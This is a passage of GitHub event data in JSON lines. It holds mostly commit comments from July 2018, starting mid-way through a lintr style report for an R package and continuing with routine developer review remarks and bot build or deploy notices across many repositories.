superfluous.**\n```r\n<U+200B>    \n^~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/helper_idsWissen.R:12:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/helper_idsWissen.R#L12) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>          TheoretischMaximum = NULL, #tijdelijk, tot issue #64 opgelost is, daarna dit en volgende var verwijderen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:475:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_1_databank.R#L475) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:476:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_1_databank.R#L476) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:28:3:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_berekenLSVIbasis.R#L28) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:29:3:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_berekenLSVIbasis.R#L29) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:674:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_berekenLSVIbasis.R#L674) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>  \n^~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:24:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L24) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      mutate(  #idee is om onderstaande code te wissen zodra de databank/rekenmodule hiervoor aangepast is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:49:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>    \n^~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:58:6:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>    # \n     ^\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:59:7:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # save(Resultaat, file = \"inst/vbdata/Resultaat_test_bos.Rdata\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:60:7:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # load(\"inst/vbdata/Resultaat_test_bos.Rdata\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:61:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L61) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>    \n^~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/1ac9d9ac355620de56ab98f1c8d7617718d5a696/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-31T15:32:16Z"}
{"id":"8044896106","type":"CommitCommentEvent","actor":{"login":"cybertron"},"repo":{"name":"cybertron/openstack-virtual-baremetal"},"payload":{"comment":{"id":29906360,"position":null,"line":null,"path":null,"commit_id":"80e04ee69d2554c98e7c0cef09004bc8bf73afc1","created_at":"2018-07-31T15:32:22Z","updated_at":"2018-07-31T15:32:22Z","author_association":"OWNER","body":"Oops, I just realized I forgot to add the undercloud-networks.yaml file to this commit."}},"created_at":"2018-07-31T15:32:22Z"}
{"id":"8044896478","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29906361,"position":4,"line":47,"path":".travis.yml","commit_id":"dbb07ca31676049606603a10aae4b1ccfbe64cf3","created_at":"2018-07-31T15:32:26Z","updated_at":"2018-07-31T15:32:26Z","author_association":"MEMBER","body":"No, on travis you don't have to install. Install is a default command of Autotools. When you do make test, you do 'make and make check'. No need to install. "}},"created_at":"2018-07-31T15:32:26Z"}
{"id":"8044896898","type":"CommitCommentEvent","actor":{"login":"rdwampler"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":29906362,"position":4,"line":10,"path":"Frameworks/OakFileBrowser/src/OakFileBrowser.mm","commit_id":"dfa5bd779e9fb8a9daa2376844d93e735c2f9018","created_at":"2018-07-31T15:32:29Z","updated_at":"2018-07-31T15:32:29Z","author_association":"CONTRIBUTOR","body":"@sorbits Looks like this file wasn't committed."}},"created_at":"2018-07-31T15:32:29Z"}
{"id":"8044898611","type":"CommitCommentEvent","actor":{"login":"klarycantone"},"repo":{"name":"erikswed/android-PlacesAutocompleteTextView"},"payload":{"comment":{"id":29906367,"position":20,"line":102,"path":"demo-app/src/main/java/com/seatgeek/placesautocompletedemo/PlacesAutocompleteActivity.java","commit_id":"d8380373814f2061aca6ff54eeda408ce474453b","created_at":"2018-07-31T15:32:46Z","updated_at":"2018-07-31T15:32:46Z","author_association":"NONE","body":"the setSessionFilter (f) function is not recognized"}},"created_at":"2018-07-31T15:32:46Z"}
{"id":"8044899268","type":"CommitCommentEvent","actor":{"login":"chiraag-nataraj"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29906369,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T15:32:52Z","updated_at":"2018-07-31T15:32:52Z","author_association":"COLLABORATOR","body":"So, fun story: when I use `EUID_PRINT()` in `fs.c`'s `disable_file` function, I get that `uid` is 1000, but `euid` is 0. Same `gid` and `egid`."}},"created_at":"2018-07-31T15:32:52Z"}
{"id":"8044900926","type":"CommitCommentEvent","actor":{"login":"amber-h"},"repo":{"name":"Farhie/xrpc"},"payload":{"comment":{"id":29906377,"position":6,"line":182,"path":"xrpc/src/main/resources/com/nordstrom/xrpc/xrpc.conf","commit_id":"759924bc3673c01bf58e19f010f62842e1ed5388","created_at":"2018-07-31T15:33:09Z","updated_at":"2018-07-31T15:33:09Z","author_association":"NONE","body":"I would just add a comment to include the possible values this can be - or references to docs? "}},"created_at":"2018-07-31T15:33:09Z"}
{"id":"8044903052","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"RonaldCarter/PHPManager"},"payload":{"comment":{"id":29906381,"position":5,"line":13,"path":"Client/PHPManagerClient.csproj","commit_id":"1e7c22cff42461a0048a4ef898c394ab82a2a968","created_at":"2018-07-31T15:33:28Z","updated_at":"2018-07-31T15:33:28Z","author_association":"NONE","body":"I understand your intention. Then the project name should be \"PHP Manager for IIS 10\", and that removes all ambiguity."}},"created_at":"2018-07-31T15:33:28Z"}
{"id":"8044904841","type":"CommitCommentEvent","actor":{"login":"Allofich"},"repo":{"name":"Interkarma/daggerfall-unity"},"payload":{"comment":{"id":29906388,"position":14,"line":312,"path":"Assets/Scripts/Game/PlayerEnterExit.cs","commit_id":"b02c1dee1c2f22e245aa98782d5792eebd501ad2","created_at":"2018-07-31T15:33:45Z","updated_at":"2018-07-31T15:33:45Z","author_association":"CONTRIBUTOR","body":"A dungeon that is easy to test with is The Vannona Coven, Daggerfall. Go in, take a left at the first intersection, and the door at the end of the hall will lead into a big room with water in it."}},"created_at":"2018-07-31T15:33:45Z"}
{"id":"8044906870","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29906392,"position":null,"line":null,"path":null,"commit_id":"78f95f4c7d399473438618e9da3518d12b4c04d1","created_at":"2018-07-31T15:34:02Z","updated_at":"2018-07-31T15:34:02Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-464](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-464).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-464-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-31T15:34:02Z"}
{"id":"8044910099","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29906399,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T15:34:32Z","updated_at":"2018-07-31T15:34:32Z","author_association":"MEMBER","body":"OK, clear.\nThe original idea was that the dev-team would have enough translators (which actually never was the case). \nI take it that this script doesn't interfere in any way with existing procedures, so having it onboard would do no harm.\nThanks for your explanations and your contributions. "}},"created_at":"2018-07-31T15:34:32Z"}
{"id":"8044915894","type":"CommitCommentEvent","actor":{"login":"Farhie"},"repo":{"name":"Farhie/xrpc"},"payload":{"comment":{"id":29906410,"position":6,"line":182,"path":"xrpc/src/main/resources/com/nordstrom/xrpc/xrpc.conf","commit_id":"759924bc3673c01bf58e19f010f62842e1ed5388","created_at":"2018-07-31T15:35:25Z","updated_at":"2018-07-31T15:35:25Z","author_association":"OWNER","body":"Makes sense. Incoming..."}},"created_at":"2018-07-31T15:35:25Z"}
{"id":"8044920819","type":"CommitCommentEvent","actor":{"login":"steelcity412"},"repo":{"name":"activereports/ReportSamples"},"payload":{"comment":{"id":29906427,"position":null,"line":null,"path":null,"commit_id":"e2847adfcf4976913aa913fcf36baf50c505648c","created_at":"2018-07-31T15:36:11Z","updated_at":"2018-07-31T15:36:11Z","author_association":"COLLABORATOR","body":"Enterprise Reports - Marketing Plan Data.rdlx\r\n-\tDisplays data/information for the Marketing Plan\r\n-\tUses Tables, TextBoxes, Lines, Images, and Shapes\r\n-\tThis report uses Expressions to color code the status of each task\r\n-\tThis report contains embedded XML data\r\n\r\nFinancial Reports - BalanceSheetReport.rdlx\r\n-\tDisplay the company’s assets and liabilities\r\n-\tUses Tables, Textboxes, Images, and Shapes\r\n-\tSome data uses Expressions to calculate totals\r\n-\tThis report contains embedded JSON data\r\n\r\nFinancial Reports - CashFlowReport.rdlx\r\n-\tDisplays the company’s cash flow\r\n-\tUses Tables, Textboxes, Lines, Images, and Shapes\r\n-\tThis report contains VB code in the script that transforms the numerical values in the accounting format\r\n-\tThe report contains embedded JSON data \r\n \r\nFinancial Reports - IncomeStatementReport.rdlx\r\n-\tDisplays the income statement for the Year End (December 2017)\r\n-\tUses Tables, Textboxes, Images, and Shapes\r\n-\tSome data uses Expressions to calculates the net Income and totals\r\n-\tThe report contains embedded JSON data\r\n\r\nFinancial Reports - IncomeStatementReport2.rdlx\r\n-\tDisplays the company’s sales and expenses\r\n-\tUses Tables, Textboxes, Images, and Shapes\r\n-\tSome data uses Expressions to calculate totals, gross profit, and net profit\r\n-\tThis report contains embedded JSON data\r\n\r\nMedical Reports - BloodTestReport.rdlx\r\n-\tDisplays the patient’s blood test results\r\n-\tUses Tables, Textboxes, Images, and Shapes \r\n-\tSome data uses Expressions to calculate the results and Reference Intervals\r\n-\tThis report contains embedded XML data\r\n\r\nMedical Reports - PatientDiseaseSummaryReport.rdlx\r\n-\tDisplays a summary of the patient’s diseases and allergies\r\n-\tUses Tables, Textboxes, Images, and Shapes\r\n-\tThis report contains embedded JSON data\r\n\r\nTelecom Reports - TelephoneBillSample.rdlx\r\n-\tDisplays the company’s telephone bill\r\n-\tUses Tables, Checkboxes, Images, and Textboxes\r\n-\tSome data uses Expressions to calculate totals\r\n-\tThis report contains embedded XML data\r\n"}},"created_at":"2018-07-31T15:36:11Z"}
{"id":"8044922226","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29906430,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-31T15:36:24Z","updated_at":"2018-07-31T15:36:24Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - Win64-Windows-7-VisualStudio-14: OK (2928 of 2928 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T15:36:24Z"}
{"id":"8044924000","type":"CommitCommentEvent","actor":{"login":"espona"},"repo":{"name":"EnviDat/ckanext-restricted"},"payload":{"comment":{"id":29906435,"position":null,"line":null,"path":null,"commit_id":"cc75a30d9908b7de2d267b0794310ca2e981f626","created_at":"2018-07-31T15:36:40Z","updated_at":"2018-07-31T15:36:40Z","author_association":"COLLABORATOR","body":"Done :)"}},"created_at":"2018-07-31T15:36:40Z"}
{"id":"8044926147","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29906440,"position":36,"line":44,"path":"09-gis.Rmd","commit_id":"b386827dedb3c36ca28d16849c24fafd445a1800","created_at":"2018-07-31T15:37:01Z","updated_at":"2018-07-31T15:37:01Z","author_association":"OWNER","body":"Missing word: what \"facilitates the automation of repetitive tasks\"? A CLI or a console in the updated prose."}},"created_at":"2018-07-31T15:37:01Z"}
{"id":"8044926779","type":"CommitCommentEvent","actor":{"login":"bebrown20"},"repo":{"name":"bebrown20/Godslove"},"payload":{"comment":{"id":29906441,"position":6,"line":68,"path":"README.md","commit_id":"88d055fc5663555bb34bca2f115d70651dc3f0c7","created_at":"2018-07-31T15:37:08Z","updated_at":"2018-07-31T15:37:08Z","author_association":"OWNER","body":"This is productive"}},"created_at":"2018-07-31T15:37:08Z"}
{"id":"8044928660","type":"CommitCommentEvent","actor":{"login":"bebrown20"},"repo":{"name":"bebrown20/Godslove"},"payload":{"comment":{"id":29906444,"position":5,"line":69,"path":"README.md","commit_id":"88d055fc5663555bb34bca2f115d70651dc3f0c7","created_at":"2018-07-31T15:37:25Z","updated_at":"2018-07-31T15:37:25Z","author_association":"OWNER","body":"This is new"}},"created_at":"2018-07-31T15:37:25Z"}
{"id":"8044932440","type":"CommitCommentEvent","actor":{"login":"Vegter"},"repo":{"name":"Amsterdam/GOB-Import-Client-Template"},"payload":{"comment":{"id":29906454,"position":5,"line":7,"path":"src/gobimportclient/import_client.py","commit_id":"0672b5b5a2ae52edabea7808e0c7b287d40f5199","created_at":"2018-07-31T15:38:01Z","updated_at":"2018-07-31T15:38:01Z","author_association":"COLLABORATOR","body":"What was wrong with using abstract base class? I do not see any comment in the commit message"}},"created_at":"2018-07-31T15:38:01Z"}
{"id":"8044932930","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29906455,"position":12,"line":154,"path":"css/settings.scss","commit_id":"1200e6cb0b48f61095c80e9c7b9e1394185ed48c","created_at":"2018-07-31T15:38:06Z","updated_at":"2018-07-31T15:38:06Z","author_association":"COLLABORATOR","body":"I'll suggest you leave the border but use a margin-top of -1 so they overlap together.\r\nFor a better ux feedback, we should also make sure the upload label have a z-index bigger than the multiselect on hover/focus/active so the border is fully shown (z-index: 2 should be enough)\r\n\r\nAlso: loose the border radius on the top for the multiselect and on the bottom for the label :)\r\n\r\nExample in pictures: \r\n|without zindex fix| with|\r\n|:--:|:--:|\r\n|![capture d ecran_2018-07-31_17-36-23](https://user-images.githubusercontent.com/14975046/43470223-5b19b2ee-94e8-11e8-8186-4af3221c624c.png)|![capture d ecran_2018-07-31_17-36-23](https://user-images.githubusercontent.com/14975046/43470220-5895357a-94e8-11e8-8980-d5c00c99a40e.png)|\r\n\r\n"}},"created_at":"2018-07-31T15:38:06Z"}
{"id":"8044933180","type":"CommitCommentEvent","actor":{"login":"Atxsalomon"},"repo":{"name":"cssi-atx-2018/Unorthodox-E"},"payload":{"comment":{"id":29906456,"position":null,"line":null,"path":null,"commit_id":"f5312779f2ac277b4b7819548290eb8157530172","created_at":"2018-07-31T15:38:09Z","updated_at":"2018-07-31T15:38:09Z","author_association":"CONTRIBUTOR","body":"![blue car](https://user-images.githubusercontent.com/39848546/43470269-cc69b178-94ad-11e8-864f-898bdc283904.png)\r\n![car](https://user-images.githubusercontent.com/39848546/43470270-cc7c213c-94ad-11e8-928f-4be9ae133d36.png)\r\n![download 1](https://user-images.githubusercontent.com/39848546/43470271-cc9029ac-94ad-11e8-8bbc-9f92cfbee560.png)\r\n![download](https://user-images.githubusercontent.com/39848546/43470272-cca1991c-94ad-11e8-9efc-6ad9eca374ef.png)\r\n![food truck](https://user-images.githubusercontent.com/39848546/43470273-ccb4db76-94ad-11e8-97bc-5b9bbc457719.png)\r\n![green car](https://user-images.githubusercontent.com/39848546/43470274-ccd18b4a-94ad-11e8-9d18-a22326dd517b.png)\r\n![neon green](https://user-images.githubusercontent.com/39848546/43470275-cce4258e-94ad-11e8-8875-0b23e8c6ffd3.png)\r\n![orange](https://user-images.githubusercontent.com/39848546/43470276-ccfb91f6-94ad-11e8-8e01-da5859274d80.png)\r\n![pink](https://user-images.githubusercontent.com/39848546/43470277-cd0d0788-94ad-11e8-8c0f-a06ef509f6d7.png)\r\n![purple car](https://user-images.githubusercontent.com/39848546/43470278-cd200dce-94ad-11e8-900a-38569482c9ab.png)\r\n![white car](https://user-images.githubusercontent.com/39848546/43470279-cd39f3a6-94ad-11e8-9bfa-290e71185c68.png)\r\n"}},"created_at":"2018-07-31T15:38:09Z"}
{"id":"8044936342","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/github-slideshow"},"payload":{"comment":{"id":29906464,"position":null,"line":null,"path":null,"commit_id":"4522b783a500d2c9e1ed44e879c32b4926e76790","created_at":"2018-07-31T15:38:35Z","updated_at":"2018-07-31T15:38:35Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-31T15:38:35Z"}
{"id":"8044939755","type":"CommitCommentEvent","actor":{"login":"alexfernandez"},"repo":{"name":"DevoInc/nodejs-sdk"},"payload":{"comment":{"id":29906480,"position":4,"line":61,"path":"lib/sender.js","commit_id":"f3d3ba555bc6f666669b4f0ee844347024b65ec7","created_at":"2018-07-31T15:39:06Z","updated_at":"2018-07-31T15:39:06Z","author_association":"CONTRIBUTOR","body":"It is removed in a later commit."}},"created_at":"2018-07-31T15:39:06Z"}
{"id":"8044940209","type":"CommitCommentEvent","actor":{"login":"Vegter"},"repo":{"name":"Amsterdam/GOB-Import-Client-Template"},"payload":{"comment":{"id":29906482,"position":45,"line":35,"path":"src/gobimportclient/__main__.py","commit_id":"0672b5b5a2ae52edabea7808e0c7b287d40f5199","created_at":"2018-07-31T15:39:10Z","updated_at":"2018-07-31T15:39:10Z","author_association":"COLLABORATOR","body":"I suggest adding comments why using schema's. Now it is a little bit magic..."}},"created_at":"2018-07-31T15:39:10Z"}
{"id":"8044942327","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29906483,"position":null,"line":null,"path":null,"commit_id":"9434908f43bfe4e3ad466be85e2e115990b32a2f","created_at":"2018-07-31T15:39:29Z","updated_at":"2018-07-31T15:39:29Z","author_association":"CONTRIBUTOR","body":"My last global change was introducing default  targeting for some effects. Right now I am brewing up a refactor of FillTargetMap and one small part of CheckCast. Its very time consuming and it will change a lot of innards, which is why I often opt for these small changes which do not break anything.\r\n\r\nThat being said, it has nothing to do with the small changes inside scripts. Scripts are inherently custom, and blizzard casts them case by case. It is possible to fully mimic the sniff packets using our system, and when I am changing a script, I am always mimicking the packets sent there. You can check out yourself how supplying XYZ or target to CastSpell changes the layout of the built packet in our core.\r\n\r\nThe only scripts where I am able to change this globally is EAI, but even there it has its limitations. The key is to know when to supply a target, and never do it when its not supposed to be there. The old paradigm was \"always supply at least yourself\" but this wrong in comparison to blizzards data sending, mainly due to network traffic (no target, less data sent).\r\n\r\nAnyhow, I am working on something bigger than a change here and there, but it will take some time."}},"created_at":"2018-07-31T15:39:29Z"}
{"id":"8044943442","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29906486,"position":null,"line":null,"path":null,"commit_id":"88a91d43b78d7ebbfaa43219e02cb910809b7d2c","created_at":"2018-07-31T15:39:40Z","updated_at":"2018-07-31T15:39:40Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [clarifywoo](https://clarifywoo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/guides/woocommerce/configure](https://clarifywoo-static-docs.pantheonsite.io/docs/guides/woocommerce/configure)\n"}},"created_at":"2018-07-31T15:39:40Z"}
{"id":"8044946680","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29906493,"position":1380,"line":1380,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:40:11Z","updated_at":"2018-07-31T15:40:11Z","author_association":"NONE","body":"I wonder if `AddTemporaryDtors` would make our life simpler.\r\nAlso, don't we need `AddScopes`?"}},"created_at":"2018-07-31T15:40:11Z"}
{"id":"8044946995","type":"CommitCommentEvent","actor":{"login":"Vegter"},"repo":{"name":"Amsterdam/GOB-Import-Client-Template"},"payload":{"comment":{"id":29906496,"position":59,"line":48,"path":"src/gobimportclient/__main__.py","commit_id":"0672b5b5a2ae52edabea7808e0c7b287d40f5199","created_at":"2018-07-31T15:40:14Z","updated_at":"2018-07-31T15:40:14Z","author_association":"COLLABORATOR","body":"Please note that the other meetbouten datasets also need to be imported, that's why an abstract base class was used"}},"created_at":"2018-07-31T15:40:14Z"}
{"id":"8044947003","type":"CommitCommentEvent","actor":{"login":"m431m"},"repo":{"name":"EnviDat/ckanext-restricted"},"payload":{"comment":{"id":29906497,"position":null,"line":null,"path":null,"commit_id":"cc75a30d9908b7de2d267b0794310ca2e981f626","created_at":"2018-07-31T15:40:14Z","updated_at":"2018-07-31T15:40:14Z","author_association":"CONTRIBUTOR","body":"Thank you"}},"created_at":"2018-07-31T15:40:14Z"}
{"id":"8044950655","type":"CommitCommentEvent","actor":{"login":"sbidoul"},"repo":{"name":"acsone/odoo"},"payload":{"comment":{"id":29906508,"position":29,"line":309,"path":"addons/stock/models/procurement.py","commit_id":"e2b18cd474f55bc9d0e4804b4f3104bdaeb85fa2","created_at":"2018-07-31T15:40:47Z","updated_at":"2018-07-31T15:40:47Z","author_association":"MEMBER","body":"@rousseldenis this test `p.product_id == orderpoint.product_id` is already part of the domain above so it's redundant to put it in filtered()."}},"created_at":"2018-07-31T15:40:47Z"}
{"id":"8044954428","type":"CommitCommentEvent","actor":{"login":"sbidoul"},"repo":{"name":"acsone/odoo"},"payload":{"comment":{"id":29906517,"position":30,"line":310,"path":"addons/stock/models/procurement.py","commit_id":"e2b18cd474f55bc9d0e4804b4f3104bdaeb85fa2","created_at":"2018-07-31T15:41:23Z","updated_at":"2018-07-31T15:41:23Z","author_association":"MEMBER","body":"@rousseldenis for performance you could add `('purchase_line', '!=', False)` in the domain above"}},"created_at":"2018-07-31T15:41:23Z"}
